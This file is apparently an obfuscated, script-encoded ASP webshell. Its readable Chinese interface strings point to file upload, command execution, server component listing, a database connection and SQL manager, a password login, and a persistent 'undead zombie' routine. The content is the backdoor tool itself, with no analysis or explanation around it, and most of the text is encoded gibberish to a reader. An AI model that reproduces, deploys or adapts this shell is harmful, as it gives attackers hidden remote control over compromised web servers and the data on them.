jDlUN,6hbx=~*#@!@*=4~*~2%cwCDk9`W(lkn`skWPdZO4x=@*@!zDD@*@!&ONJ0KxOY4'?@!8Lc2lai='K@*[U8ksT!ZTKDx[sDPmKVY@!0Kx'VX[=动类型l?UU@*,启x{UUyGs/alwU=P^owsosMxU?aL^KVWT=?P8Y{=? 4kTt@*@!Y9~[?@!ODH1Chk/aslK4Lc9dwpULU@*[U8wsos?=U[soG^WDx=,4Lm?=y!=bo4Y'DN,4+JY[@*@!:n'?@!4N 1mwi?'G@*Lx(/oso=?U:swoVKDx=,4o^G? TU?L4Yx?N,t+bYM@*@!Dqq[?@!j(8'?@*==V/|@*@!JYM@*@!zO[J0GxDOtLU@!8NRwC2pU'W@*' 4d2,OssKD{:&DP^W^T@!WKx[^a[?动类型)U?=@*$启 '?U+WsdaloU?~mwsoowD'==[o^W^GZU=,4D'U? 4nkTt@*@!DN~'?@!YMz1m:+bd2VmW(L fd2pU'U@*'x(soowUU=:wsGVK.{U~(o1UUy!?ro4YxY9P4nJYN@*@!:[U@!8%Rglai=[G@*Lx8/wos?U=:wsssGM'=P(L1W=y!?Uo4Y{=N,tnkDD@*@!Dq L=@!Uq {j@*U#+ N~kW| +aY#@!zDl8j& [='Uqq[&'UqT"IUP?^+@*=JBndW*)3U9Ps!UmDkW loE mDkGx~jD-+M(x6Wcb=26n/!YnPUr 0GAxvJYDE@*'EmnxmVrL 'BZvP9Nk LnV^wmBqB~^1kUo{sVkwCTEPmn[DxBE~(W.E:xEKVK.'EP8o1'v0Z]hb[Y4l4^n~4M@*@!Yjqx=@!U|@*@!&YM息@!&O9务器组件信xEv@*服M'v:L1WsK+MBP(B1nxDVro 'vfEPlk2l 'B,^GVD'E TtnrTt@*@!D[PLU@!OM?qxj&@*==D[@*@!&*[?@!zgbt3U".3I|/c=U2km8V+DjC.Rk+M\5EndD@*=[Mnswsov{Baoo1WsWMO9P8TzDN@*@!4k2i@!sv@*LxoowssK.'Ea4T^GV@*@!DN~名@!&O9B@*服务器swoswDxv[so^G^WT!E~(Y4{ByBPSk9O'E TtkL4@*@!Y9~xD+DEUxB1+,lskL'?@!ODU('UqO.@*U=oowB@*B[owsG^WM'N,4T^Y9@*@!YkwI@!JB@*LU4wsswo.'Eawo^WsG@!Y[P(@!zDN@*服务器(hssov@*B:swoKVGM'EP4Tm{v Z!Ak9Y4vy!B,ro4Y'D[~t+MB@*@!v^xOVbLx{@!O.,llUVE@*xB|8^l.T+DD:EPDvka0Gxm:nxm/wE~x9+6c^G:JkaFf% ASh kD2)JzUxEtYC^DkGwKdDPO4W9'DsPsn[?@!WWUqxj&U=JWWM:zD.@*@!JY9@*@!B+v@*@!CV!n'Kxv~7Bl^ObxC:x9+UEP{BtbN,OXa+rxaEO查询v@*@!V!n'EYB,-C/!4skzwnxEw;Y,O@*,@!rU?#[=v|b9f"J}Z)dV/`?lMrl(D-+M.dOc?+"n;!++{v=[,\mV;'vqlB~/b"+{Br2EPxChYn6DvHwn{BaEY,YL=@!bxjq{?(@*?=@!JOD@*@!zD[@*x(/aiGh'=LB@*ULUswsooM'B:oTmGVK@!DN~(@!JYN@*x(dwpsoB@*[:owss^GD{BP(L^W9@*@!Y[时间@!&OE@*服务器oswosM'v:womGsK!TB,8DtxE EPhbNDxBy!4+bo4@*@!YN,UYDB xvmPmVro'=@!Y.?&x?&U|@*@!zY.=@!zON"j?#';2U?rw{h]r~2]{}`=H`Hl(s+kD.m.r?D7+;+dOcU'I5swsv@*EasooKVGD{[,4L1Y9@*@!D/aI@!JB@*[ 4oowssMxB[so1GsW@!Y9P8@!&O9@*/n`数量v@*服务器wsoowD'v:wo^W^GZ!v,4Dt'E E~hbNO'E T4ko4@*@!DNP OnDEx{B^+~C^kL[?@!YM?(xUq@*=|9@*@!zD'?@!&DU}?U*4^n/v.CDbln.7+DdYc?["n5EwsE@*=aoowssWMxB,4L^KN@*@!O9wI@!JO@*[U(/wsswB{vaws^W^W.O9P4T&Y9@*@!操作系统@!v@*服务器swsws.'v:wo^W^G!ZB~8Dt'v+EPAk9O{B+Ztko4@*@!ON,xO+MBUxEm+,CVbo[?@!ODUq{?(D@*=#@*@!zD.U@!zO["2Ub'}sPz#AImU`??2"l(s+kD#lMkjnM\+!n/DRUL]n;wswB@*B:owsGVK.'9P8L1YN@*@!D/2i@!&E@*' 4wsswsMxB[sLmKVG@!DNP(@!zDN@*服务器版本E@* 2~swsos.xEaoo1GVK!Tv,4Y4xE vPSr9YxE Zt+bo4@*@!DN~xD+.v 'B1nPmVkT'=@!DDUqx?(@*?=x!,PWwW.~bPFf|DN@*@!JbLU@!JYvk~y@*?'?K's+6YCsboxwosEPB[oosKVKDxN~8TmON@*@!Y*[=@!JY`rS8@*=[UGwsowB{Baws1GVKDON,4L&DN@*@!T#LU@!KOckBB@*U'?oowsoD{vawo^G^W!Tv,4Ot{vyB~Sk9Y'E Z4+bo4@*@!Y[~ Y+Mvx{Bm~CVboLU@!Y.j&'jqD.@*?=HnXY=]]UPjqrSh/G*)AxN,s!UmDkGx=s;U1YkKUPGWh orV`hlOtblA6nZ!O+,?rU6W2Ucrl.V ;/nKxkwI=*b~Z`WD`j^DL+}8Y+l;.xPtP}?OPjn#+Ura\R}?|~8P'2n:X\R}j#lO,n^+sbWsoDmNJWtR6j4=#3wUBUY42C\vIY.xdx&/"F#"#B/O4alNc\b[~U,n{lhxbVP6Ypnx4:CmDY=CBPx?rWbYWkd2fbY +UxO/KP=+MCN_+[[cb/nG /2I|by U?tPr?~D4xTSnY +UUDZW,=+MlN_n[Ncbk+Gxd2"+n=R=s jP~?P'nOM/4lc/k+G /aI+#ls.+kYOOD+G^ zkKCYbmw^C2P?P{wnKzUDYnW Zk+GUkwIn=#+CR"jtP6D+MkXqlMrxcAd+Kxd2"+N#dt^ERwdnW /aIn=Gd;V\R}j+#kUO41Wx~tP6?D~U+Lr~hW/*)AUN,s;x1YrG )s!UmDkW ~uKtSAx^W[nv?b)bWP WO~b/x;s^`j#,O4+U=?{PDw^Cm`j~r@*ESr[oDIJ*)?{.nw^l1+c?SE@!JSJLsYpJblU'Dn2^l^+vjBZu"`2,#BJL:&OiE#=?x.wVm^+v?~;u]`2c*~E[5;KYIJ*l?{Dn2^lmncU~/C"cy!bBJLx4kwpE#=CPHd2U^KN+{j)xN,rW)Ax9PoEU^DkGx=dE(P4r9N+Ud4+sV@#@&6wCDt{D+$EdYc/nD7+.-mDkm8V/`r2CY4{DDCxdsmYnNrb)k+O~6/WxdD-+M 1DnmYW4N+1O`r/^DbwOr oR6rV/XkOn:K4N+^YEb=wn6{EmK:qk1W:+k1Wh&-^K:*-mK:*-mKhv-mG:Fu^Gs%u1G:OuVaOqu^wD kV2O2uswD*u^wOX-VwO-V2YFk^wORu^wYOJ=.x9wn6{/2sbY`an6BJurbcD N Eh4n.v!SFFb#=/ndkkWUcr/nVNAr#xrJ=0k^+aCY4Fx/D-nMR:m2wmYtvE J*)6ks+UCs+q'Mro4YcWalY4S^+U`62mY4*Obx/DDMn\v02lDtSE'J#*lEMV'Mn5E/DRd+.-D-lMrl(VndvJE.sr#lEMs{Vn6YvED^~bU/DD.+7`;.^~JJE#*[D [2+X[rRE[Wr^+UlsnF=0dGcmW2z6ks+,WalO4~r--c-r'0bVnwmY4qLJ-r'D Nwa'JcJL0rVnUm:nF=d+DPWdK'xGO4kUo=.M/~r@!kmDbwD@*wmDnxDRsG1lYbGx{BtDO2)Jzr[.+5;/O`rd+M\n.|xlhnr#'EMsLJvp@!J/mMkaO@*r@#@&+ N~d!4)w;x1YkKU~jasbVn`bl@#@&(0,]+$EndD`J)^DkGxyE*'EhWkYJ,K4nx@#@&j+DPix +h,in;P),jnY,s{j j)crSGmmssbVnE*@#@&iHm:n'` 6W.s`rKWhlD4J*@#@&q6PiHm:+{EJ,rD,o sbV?rynxZPOtU@#@&?(xr@!4.@*请输入上传的完全路径后选择一个文件上传eJ@#@&Ask+@#@&sc?l7+zdP`1C:@#@&(6P2M.R E:(n.'ZP:tnx@#@&UqxJ@!^+ Yn.@*@!4.@*@!4.@*@!8M@*文件ELjgl:[r上传成功!@!z1+UYD@*E@#@&I"jPrJ[1G2X!D^[EJ@#@&Ax[PbW@#@&2U[,q0@#@&U+OPwx WO4k o)U+D~j{xGY4kUL@#@&?&x?&[Am^VjMV@#@&]Ij~Uq@#@&U4WS2..v#@#@&]/2W dR3 N@#@&2 N,(0@#@&jq{J@!8M@*@!(.@*@!4D@*@!Ol(VP8W.[DxBZvP1+ssalN[r oxBZv,mn^Vkwl1k L'E!vPmVrL 'B1nxD+DE@*E@#@&?&'jq'E@!0GDs~xm:nxEjwoGM:vPsnDtG9'EwWkYE~l1YrW 'vELjId'JQbmDrGx{jasrVn'zmOkKU {nGdDBPnU1YzwxE:;^YbwlMYJWWM:RNmYCv@*J@#@&jq{?qLE@!YM@*@!Y[@*E@#@&?('U([r上传路径:@!rUaEY~Um:n'EPKnCDtEP\mV!n'EJ'I"+KCDt`Un/kkW cEsKV9+.nCO4Jb[rwb7RCdaJ#'EEPdk.n{B*ZB@*J@#@&?&x?&[EP@!kU2!YP C:'BdG^l^sbVnB~OHwn'EWk^+vdby+xvy*v@*r@#@&?({?&[J,@!bUw!Y~YHwnxE/E(hkDBP Ch+{BUE8:rOEP-l^;+{B上传v@*r@#@&j({?([r@!JY[@*@!JYD@*@!JWWM:@*@!JYC8^+@*r@#@&"I?,j()@#@&Ax[Po; mOkKU)=s;U1YkGU,ZhN8j4+s^`*)2X+;;YPjk 0G3 `J14+13+9x=P1tmV+[=#YcUUK+$End*P'~]hlOt?j4+s^kKx`?PUn/kPPtxb@!@*UUv=?hU;!ndY&0,InUb|mY4U*4+^VKG `Ujj/dkhCDtxUtVV#:9 +XPxP?msKmYt,jtVP:4nxDt{U=+sshlr0,jtU|4m3n4x~md?PO*@!@*UXMkaOUvUA/1;;nkYk6~IN'?=|msN?#n/Oc?P]+$;ZsN~x PfnW?PPt=*@!@*?`?m:9;!n/DqWP"+|dDB@*?['EwWsnOtK0KDhPj({U@!=(dwpUd2p[xv@*Lx8t={Z]vSk9YYHVx[?B~?^nCO4[?4nV!+'E=vP7l^+xBjKDPUls@!k w;Jd路径:[UjuA?('U(#tn^V?kwDRU@*Um.3N'=Lmt^X/B?s;+{BDB~\Cd1Drwsn'Ehav,xln^04G+{v1t^,YHwVm/kxw!Y~mLU@!r ?q{jq#ccZIvkTtD)T]I4Y4)8T'Ehr[UYXsnmDnl,@!D+aDB执行E@*l^ExkDB~\E/;8sYXan' wED~v@*,@!bZhN'=?[9+6sE'vYEP\CO4)1 {vSk[UYHV+1:9vPm:n'Ew;O,x[?@!k ?q{j(@*?=?PPtn=*@!@*Uv=msN oKD:5;/Oq6~"+U#/?PY4#{=XDrwDUc=S/mcoWM:;!ndYb0,In+U|UWO`8%+1YcCD+r8\{Z.+UnDP/B!*#=?[Gn0?P&m,nCO4[?4nV^+6^cf{ZtRj+O~GZhN*|+mNCsKEY .GRdY9CmlxGV#?q{?&'lml|+^/n|,1+XO+kE:.GD,I}x~2.|c?4+^^DbwOOvUj6(LnmMnmYn7+MRZk'UnDU+OPSV=b#R?4nV1DkaOO`?Ur8Ln^M+CY-+MR/d{?+.jY~h^=*=8N+1Y/D+s6k^+jXbxL wmDb2Y1Y`?jnr(LZ.+COM\nDcdW{?njYPW=*=hNcOXY4vU1:lawm.\D P{Pdnask^n/.K+sO=##PZ~~Kor^+Sy:n:aU~',/P=~@*P/:9~L[~G+6zm,U,OtLU~+^VKC P`U4hkRI!/CV^PMEn#|%mOUDn:}4snUX/ULcsrDb2DkOvUUmr(L^DlO+kPx~;?+D~0*=/S~!BPwlsVnS,Fn:aok,`d":Ysrs+UKa6/ }w16P{PwrVVj+DPGb#RICN^+V1an`Ksb2UmG[cCPHdnD7+.Cml'j)^Vb=^^XR/KsbV+^Wkn=BPPD!wor^+/.P+ssk^nc+^+D+W/G GZCV^~+*=j({?q'Cml|+ [,kW#2 NP&0#@*@!J0GYmDnC@!zYaF2#[?'^tM`Uqx?(.s@*=="]?,?(EBn/Gb=2UN,o!x^DkKx)A6/ED+~?bxWGAx`rrW1YE ~ox9)AY.hjU'~0,rxDljXY1nb=WdPh~ vqR&y,PvPLG/3nb#,FrSBPYMO/T+Nv\rmvbk[~D~jD+AP ~'DDAj +#lOMYdoUvSnKP,KP8P{~kKDlsDDAj +~,~kb:)GdbnK~,Y.YdL0ck nD,?GUDkx^o!xE~hGk#lwE mYbW ~ZM+CYH[8vnlD4#=26/;YPUkU0G3 `E@*?8D@*@!8.?@!qx~U=bPZby~Ov?KY`m(%+}lODP/~{PZOPU=Y4KC[,U,+xD^G!PjYm9lZi* ~R296dY 9OcWWK/1DHbD{[+7k.W?nncmYD Z,Z##ULtbWDPHPx~;+OPU|tPPxZ+Dh8 E.RA.6P~&x#功"建成U新LP4~lDPKPL?(x,qP,jU#Pq [~26=MVVjC^LAjq&xPUP|~UI?~]&JSnKd*)3 N,0E mDrW )oE mOrKxP;G:almD\[4vnmY4#l3X+/EDnPUkUWK2xcExPt*~BFcZWDP?KY,Hq6=b#B!cfKY`U^YN+r(On+mZMZxY~jP|lD'n?PnxMmW;~UYCfmTpc ~RAfrdYcB+DRG0K/^.tkD{[+7kDKSK[?Y4nCU'n{D^W!~?Dl9CZic $c29rdOc9nDRK0WkmM\kM'[+7k.G?n+,C/m4lDO9l1:aZGZ 4#kUY4HW;'O~U+o|d2s=*bBFcZWD`?1YNnr(Yn+mZ.6{s?D~?=+ P4#,Y4nC/cdD6r+ArVcsj6,sqW|*#S!vfKYcUmDL+}4Dn+mZ.Z{Y~jP=0=4mU{4'CYLn?Pn'.^KE~?DCfm!I*cAR39}SORxnDRG6WkmDtkMxN\rDK~K'?YthCUL+'M^GE,?Dl9lTIWR$RA9rdY BYRGWK/^DtrM'[\bDW?n~lkl8lDY9C1:w;GZc=k O41KZ{Y~?nL#lOPhs+wkOn^+fn6csjt#CD~K0U(lU|tLCY,ns+wk-ntWrco?4=/3s=@*UDUY^n@!z现!有发=没tLCYLn库=数据.@*@!4.@*@!4.@*@!8M@*O+ @!m{UU(P#'q+M:8U!DRA.=&0N,3U=bxDtHW6xw?OPUno#qW[,2x|n K4!,.{4n!:cxDMPA(0#@*=+MxO^@!z功!缩成?压4[mY[h库=数据.@*@!4M@*@!4.@*@!4.@*Dn+ @!^x??q|(6N~2 |`D^0Amq[{?U(V#?(?,I]EBnWkb)AxN,o;x1YbWU@#@&r6Pd+kdkKxcES+4+CyNhk E*@!@*`/Dnm/k~Y4+U@#@&kW~M+;!n/DR0K.h`rwm/dJb@!@*JEPD4+ @#@&r6PDn5!+dYcWKDhvJal/kJ*xjk+.nm/d~KDPMn;!+/D WWM:vJ2lddr#xEMsPDtnU@#@&/ndkkGxvES+8ylyN:bxrb'`/nDhldd@#@&k6~k /YMc;D^~^mC/ncrmG:rb#@*!~O4+x@#@&M+dwKUk+ M+9kDmD~EMV@#@&Vdn@#@&0aCY4'D5;+kYc/nD-nM\CDbC4^+dcrwlO4|Y.l d^lONr#@#@&/OP6/G'k+.-DR1.+mY+K8%+1YvJdm.raYrxT 0bVndH/YnhK4%+1Or#@#@&w6'rmKhF-mG:yu^Gs&u1G:WumKhXu1WsvkmGhFu^Ws0u1Wh1r@#@&.U9wn6{daVrD`a+6BJ-E#vDUN Eh8D`ZS%*#@#@&dn/kkKxcJdn^LAJ*xJr@#@&WbV+2CDtq'knM\nMRslwalD4`rRE#@#@&Wr^+xmh+8'DbL4Yv0alOtSsxc0aCY4#Rr /Y..\c0aCDtSr-r##@#@&!.Vy'.+$EndDR/.\D\m.rl(V/cJ;.^Jb@#@&;D^ xs0Yc;MV+~bUkY.M+7`EMVySJJJb#LDU[a+6LERr[0bsnxm:F@#@&WdKR^Waz0bVn~6wlO4BJw-cwr[WbVwlDt8'J'J'D N2nX[JcE[6kVUC:F@#@&j+O~ lh+kW'6/G V+Yor^+cJ'wc-EL0bV+alD4FLJwJLDU[a+6LERr[0bsnxm:Fb@#@&Um:n/6 lDY.r(EYnd,'~&O@#@&0dKR9+VYWk^+~0alO4@#@&/OP6/W{UGY4k o@#@&]]UJ@!4M@*@!(D@*@!(D@*@!8M@*@!4M@*@!4.@*@!1+xD+M@*不死僵尸创建中~切勿关闭此页面cR RcR@!&1+xDnD@*J@#@&jnY,W(LpHJ~{Pj+M-+MR/.lYn6(LnmDcrHjoHd RU+M-+M(\S_KPKr#@#@&G4N(Hd Gwx,J!2PEBJ4YD2)JzAn(/lWnc0CmmrK3 1WszL!/D{yJ/aRm/2_!'JL.+$E+kOcJk+M\nDmUm:nJ*'EMV+'r[wxELjd+MKm/dLJr~0mVkn@#@&W8LoHJ k+x9c#@#@&I"jE@!kmMk2Y@*Abx[WS VKmCObWxxv4YOw=&JJ'M+$E+kYvE/D-+M{UCs+J*'EMV LEvi@!zkm.k2O@*J@#@&UN,kW@#@&+Vdn@#@&.DkE@!mn YD@*EJLnDMW;YLJv@!Jm+ O+M@*J@#@&nx9Pb0@#@&nsk+@#@&kr'r@!^n Y+.@*@!Nr\,dDXs'Ehk9Y4l*Z!26p4G.9+D=qwXP/KsrN,ay +i2C9NrxTl ywaIslDLr )q!Z2Xiv@*@!(D@*@!tM@*@!wr]H,b^ObWx{vJLjId'EB,:Y4W[xhWdY@*~@!&1Ki:PYz2'KlkdSW.9P l:'hC/kPdk.+x+y@*[ 8/ai@!bU2EDPDX2+xd!4hkD~\mV;n{SWLr @*@!tM@*@!4.@*JL::ktsVLJ@!z9k-@*@!zmUYD@*r@#@&k6PbxdY.cUqS?&/#@!@*T~Dt+U~MDdPk(@#@&n N,k0@#@&Mn/aWU/RnU9@#@&UN,k0@#@&oE mDkGx~9(HCxmL+M`blA6+/;D+~?bU6W3 `rYD?#*=?$VjsKDhc!+/D :vI+$.xKMkU;s?O|G4jYMGDs`=nkYRox"+5EG8UY.?##kxT'EswmN[B,mns o'ET/almb~^+^VM'v!v8KD[+E*ZBr[Dt'8sPA[?@!Dlj&'Uq!E@*?|W 'vB,l^ObwWkOB4WN{vvPs+D4oW.hs+xBG.:,xC'?@!0Gj&'jq@*=#接串)@!Ji数据库连Lx4kwy{B@*PLtD'vv,t+bxB8!!Sr[Y4@*@!Y[P'=@!Y.?&x?&Y[@*?=zO[@*U=U?@*@!4jDDLUU?[GCV!+xGZB~-9Yt=*+{Bhb~dYHV(?ODvh'vf!OP l@*@!bxw'=@!Y[?&xUq|aYbWx连接@!zK^m/d+{!@*),\l^;wDkW GU@*@!WJW2Yr接串示例@!{Oq@*连7CV!+OrKxPv@*@!W2l^;#nXTc\+9q [+^+^YKxd,k`WaOkG4?D.~s!V^+OE.UT+xBMUm4lUO BPGvUY.A Cs+x^+1YPE@*@!d+xO+MoUxEmB,CVbt'ETPSk9Y'U@!O9?('U(@*?=2ObWx连接@!&K&@*fUHmV;'bWx,\@*@!WaY2YbWU连接@!JWHHj;^E+{+@*x,\mVGwOrKkGx@*@!@!JW2OU;V连接xq@*Hd\ms!+ObW P[?@!K2?&'jq@*U|ObWx@*据@!zKw*@*添加数CsE'bWUP-@*@!W2YaOkKx数据@!&K'c@*显示-mV;+DrKx~ @*@!WwKwDrW法 O@!z ?}J语{OF@*R\mVEOrW PLU@!W2j&'jq?|kKx@*=@!zW2O@*建数据表V;+{0Kx~7l@!WwDkDrW @*据@!zKw{@*修改数mVExkKxP7@*@!WaYaYrWU数据@!JWxv@*删除-l^EnObWx~'?@!GwU({?(#wDkW 字段@!JGF8@*删除CV!+xrKxP7@*@!KwYaOrW 字段@!JWq!@*添加C^En'bGx,\@*@!KwY2ObWU据表@!JG{,@*删数7l^E+DkKUPLU@!Wa?(xUq@*?|@*@!zYM@*@!zDNVnmOU@*@!&/K2YbW全显示@!&{F @*完-mV;+DrKx~LU@!WwUq{jq@*U|V!+xv BP7CtbNNz2+{BT+vPOn{BKlD~xm:@!r wELnMB@*4tC l;'EfB,\msk9Nnxa+xv4xB,OXzmYbGC:'Ew;Y~ULU@!k jq{?(qE@*U|l@!zONd操作命令daij5B@*[x(Y{v&ZtnkTt@*@!DNPL=@!DD?&xjq@*U#@*@!zO[M[=U?j;^?Ox?UU'-mV;+W{ZB~bNDt)^+{vhEPdYH;sjDD:xBUEY,UC@*@!k w'U@!O9?('U(@*?=&O9@*UcbE@*@!Z4n13. PG4BM+D;VbmV'EPGU1+'E执行~\mVE(hrYE+{BjEv~ lhE(hkDwnxE/EO~DX@*@!bUaxODEx'Em~l^kL[?@!O[Uq'U(=alx@*=v@*@!zk'vl8^mx~k9n@*@!/2&Dl4sGM:@*@!M@*@!zWLU@!zYUq{jq#ql?&']]UP??==ZPK4nOD*@*Wxcf8j&0~SU=v*ST*Y`jGDr8L^M+CD+Kxx{ZUnY,Zb=G4jOMrwUP;Wx |:m`y!U?^4x ran/{ZGUU+Y~]*P|D@*名@!JN@*表@!4;B@*@!Y;/Z;ZGD{B:$TmW^v lBPbL4Y{YMP4+8s@*@![?@!Ym?(xUqY[@*?=-+wrMIdcHK/Y,=KOP"/rVPH9KP4 2K0=A=~Y4U:b$SK3?#xSAmKI`=PzAqW~"/nx#mgb\AKzASA'"d`?KHls+=b#l@*@!8D^PT@!&@*$,NUSFbv[=T?'KglhJAP$=K,K)A?=GI6^?DD`!V^j;bwO)w\Cd1D0{vLmlP4.nYD@*@!U'^n PCVbL[?@!O[Uq'j(@*U|@!JO9@*=@!zm@*1m:'B@*U'K?USq*:+L=T?[KgC]rtP]K~e~oU2J2;ODvU=sU;VjO=s;Vk^Mk2ELm\l4DW'LU@!l,?(xUqU#3x9Pq6~|\16]/ \KY~=dGWaP|d{1WOjY~I4r o|m4^+@*M@*@!&YLU@!zD?(xUqU#()Uq'"]jPUU?=q!~P4?OD*@*xv?5s&0PJnx|mD=,Y=k+^+~+#*x;^?OD0OcUl/cS&0Pd/4+ =$VjY.句:=L?'U执行语U('Uq|GMN/n8cInm?)9W[N+1Y`mY64k'/D?nO,IY?b=;Wx Ss?DDB+UPj5"/ Waq~8=[dcZW ob+ssgx"/; Y#DN;W! ImGI;']d Y=Tn?byIk Kl'y!|lLnUkxIk n;W;UDy+|/KEUYcKmonh1{I/#lTnU*/O`?n.n$E+hCo'=TcKlT+{ZsxU~hlLU,Pton@!@*UqW~hln##~hlLP:t+ lTn'ZP6D,nLn{UU&WPhl'8|~nmoPPtnUT+@*ng(0,nCxh1=xKmon+aCT+dKV!YIkRm8K4+UPT+@*q,q0,Kl#YN@*@!&m1m@*@!xa^^1mGVK. lP8LbotOxDD~t8^+@*@![?@!Ym?&x?&Y[@*?=~ogOF{TPDWsK.~x#+s`U#[dcqORwr+^V[x"/?nO,s|+L=@!z[c1m:@*?[wsxD+.B 'v^Pl^roLU@!D[jq{?&Y[@*=|DtrxTsN{xGjYPo|g+aY#'?@!&D?&'?&D@*==;W;xDP)U9PR~G0*WD,]dRAW6PGYc]kks+,HfKP 4@*!=x/KEUZK; YO F#2sAsAGD{U:ATmGswU=D@*@!JY@!JWGxT/E@*axL[bxn'EAkDPWC1@*@!WG m^m1^KDx[m(omKV@*@!Y9P'U@!Y.j&'?&[@*?=PwHRF{!,KGsG.,k|U=3x9s3oAsDx=[2LmKsKVd)~s*?)A:slsXVKDx==Ao1GP:t+ 3o2wU{U:2o^KVGD&WP~o~r6='q~:t(0,];+U#Ik`k*mK[+vK\SAxUWK'C,/W^q##3s/=B*T#b]k`r#dn0D`^G9+`P\d2Ux6G{C~;W^q=Ax9~q6='U@!zOs&x0K@*ULZW^G.[?[~o^WsGM'=P(LmK[=@!DN?(xUq[@*?|g+aD=LU@!JYU('Uq.@*?=-ng+6"dRtWY#JGWa=&)jqx]"?~??==^?O.*N+cj$V3x;GM'uD:U;VUY#'UJU'[hlLnp页码:U[ 8/a[I;'=记录数:U YD@*oUx1+=Pmskw1QqLlxx=LmGVk2@*@!O9PLU@!DDU('UqK1#@*q~:tq6~ng+x#C@*[ 4上一页@!z'Ubv@*lL+ qUBU'KDD[==L?5VU.vU=??$V?D)w;V^m.kaY%C7l/Mn0{Bi@!C~tLx(/2页@!&C@*FbB@*首'U?US5^?Y.=?U'?^jDDc!V^?;bwDls7ldmM0xvNll,4D4/aI@!/aiLx'U'U(?('U(/ai=|AxN~rUwxF=3^/n=oO%=?axnmK4+ )Ln@*%P&WPhl0#G~?a_{?2PPoKD~kR|kDPoGxP3ah1~K4(6Pr@*D#nlT+,(0,kxK4+U| 4/aI[b[ULj('Uq?=3Vdn#[U4k2U@!zC@*@*U[r'b[=#E=?~=L?DD[?ULj;^Y.`?Usj$V?Dls!V/1.rwELm\Ct.n6''U@!CPUqxj&iU|3 N~q6|g+aD=尾页@!zlLU*v@*BU'ngD'=?U?$s?D`U?=';^?DDoEssUDrwDll7ld^0'v%@!l~tMU(/2p@!Jl@*LB@*下一页QFLUb[hlLn?UUB=VUYDL==[U;UY.`=s^?5VaO)wECd1DkxvNl-P4.0dai@!l[?[ 8?&'jq@*U|3 NP&W=m4V@*.@*@!zDN@*@!&OE@*@!zDo2w2o.{Ba3~1WsWL=@!t.Uq{?q?={HWDtnY,IdGk+)U]/cZVbUL=&)UqxI]j,?=U#3Vk+~|^?Y.bD+c?$3X+^!ZKxxc=U5VUY语句:=[LUj}d?q{jqM=2 [~q6=&)jqx]"?~??==Ax[~&0=/sK/nZKU R|KY4kxKx x1U+OP;o|3 NP&WJBn/Kbl2 N,s;x^ObWU)Gr:,Kq@#@&sEU^DkGx,3 ZG9+vr4N?D.~}4%nK/b@#@&fks~1h?D.SKswUY.~rSd+U?D.)d+UjDD'Jn `64NjDDb=sKDPb'Z~KKP(xD`Jn ?YM&r(LnKdbO8)::2?O.{HrNv64N?O.Bke68NnG/3qBr8NnK/#LKs2?DDl16OlAxZK[+{K:ajODLIbo4Yc6(LjYMSSxjOMPHG[,r8LhGk#@#@&2 NPwE ^YbWU@#@&ZsCk/P`KZ=fks~9FBfy)KE8sbm~s!UmDkGU,sW.hvsb)wx^mCk+vs#=q6~f8Rn6b/Odvs#,Otx)wG.:{f8`o#ln^/n)wGDs'EE=+x[~b0l2 [,s; mDkW )h;4^k^PwEU^DkW ~jz`s*lo'^mm/n`ob=qWPG+R6rdD/`ob,Y4+ lk+O,jz'fy`wb)Vd+=/nO,jb{U+SPs&ol+ N,kW)3U9PoE ^YbWUlhDk-CD+~?!8,Zsm/k{q kDrl^k"+=frh,KfmSKUY~78/D^0BK(xS9&2UNBP BKJn ~KoJB?o.BoUYCMYBs2 NB9?Dl.YBf3U9~jaHls+)knOPGF{Z.+COr8L^Yv?GOvc~Tb*)r0,];;/DRKKYmsAHYn/@!F~O4+x,36bYPU;8@#@&P,/nY~P8'/DCYr8%mYcjKYcvBT*#l:FcKXa+{q):F HKNnx2)K8 ra+x=PqRqDbYnP]n$En/D AbxC.HI+C[vIn;!nkY :WDlV~XDn/*)PFcnGdbYkKU'Z)KGCxK8R"+CNl9UYCDDxF=f3U9'SnU~`Pfmb=/nDPG ';DCYr8LmOcUWYv*~Z##=-8ZMV6'^t.$vFf#L^tMAcqZ#)dnDPP {/M+CD+}4LmDc?KYcvB!bb=K?DxHbNAvP9lBFBqU?O.~`9?DCDD~P9m~\8/MVW# q*)Pd+ 'Sx~cKUYb)G?OCMY'GjYmDY3PJ+ _8)AtrsPcfUOlMYQqZ#@!93 Nlf&3 Nx&xUYD~`GjYmDO~:fCS74ZMs0L\4;.s0*_2)P PHwn'8lKyR\G9+'fl: ran )P8RhW/bYbGx{fjYmDOl:FR;GwHKW,P+~GqAx[O9jDl.Y=P cnGdbYkGU{!lKy :X2'y)KyR;4lM/nY{JL8y&FyE):qx{P+R"+mNP+aO=K+R;sWk+l9UYl.O{qU?D.~`9&2 N~:fmSKUYb)w?OCMY'&U?DD`y+SK&xBJUlhn{JEJBq#3vloAxNx( ?ODvoUYCMYBKq ~rEJr~q#=j2Hm:+{smm/+v\rNvK&xSsjOmDO~w3x9OojDlDOb*)r0,( ?OMPvc*BK&U~r0rVxCh'JrE~8#@*Z~Otx@#@&~PdnDPPsdxxh~o&s)ojDl.Y{( ?OM`w2x9~:(xBJWk^+UCs+'rEJBF#3qT)w2 NxqUjDDcsUOlMYSP&x~EErJSF*lw?OmDD'q ?D.`w2UNBK(UBJZKUYxY Pzw),JSFbQ8clsAUN{qUjDD`ojDl.YBP&xS74;D#=KwJRwks+UYC.D'f&3x9)KwJ sbV?rynxG?OlMOOGq3U9O&lr6PUWD~G A6b/Yk``21m:n#,Y4n )fy l9NP`2Hls+BKoSln N~k6@#@&,Pnsk+)P+cKzwx8)PyRtWN'2lKyR6wxlP8RnKdkDkW x9qAx9)PF /KwzKK~Ky~9jDlDORGq3x9R2)PyRhW/bYbGx,'~!=K+ :Xw~', ):+ Z4lM/nY~xro8 2q r)jojP'~PyR]+m[:+aD): R;VKd+=kWPGF 3Xk/Dd``w1mhn#,Y4+U)9qvj21mh+*'9qvjwHCs+b[rSr[jw.=+Vk+=9Fcb[N,j2Hm:+Bjsj)+ [~k6)x[PrW=fjYm.Y{fjOmDYQPd+U_8lS+U9):fl{Jrl/Y~Ky'UGDtk L)AxN,j;4=nMk-lOn,?;4,/Vm/dm:+Dhr lO+=r6P];!+/DR:GYmV$XD+d@*ZPY4nx=fFc]n:K\bsVl9yR]+sG\bss=/+O~GFxxKO4kUT)k+Y,fyxxKY4k olP8RZ^G/)/O~K8P{xGY4r ol+ [Pb0l3 NPj;()3x9~;VCk/=@#@&wE ^YbWUPUkUWK2xv64N?YMS64NnK/b@#@&6(LjYMxIwsC1+`68N?ODBE?JSrJrJ#=1A?DDx?aVrOvr4NjYM~J#Eb)wWMPr'T~:W~j~GE NcHh?O.*)jk 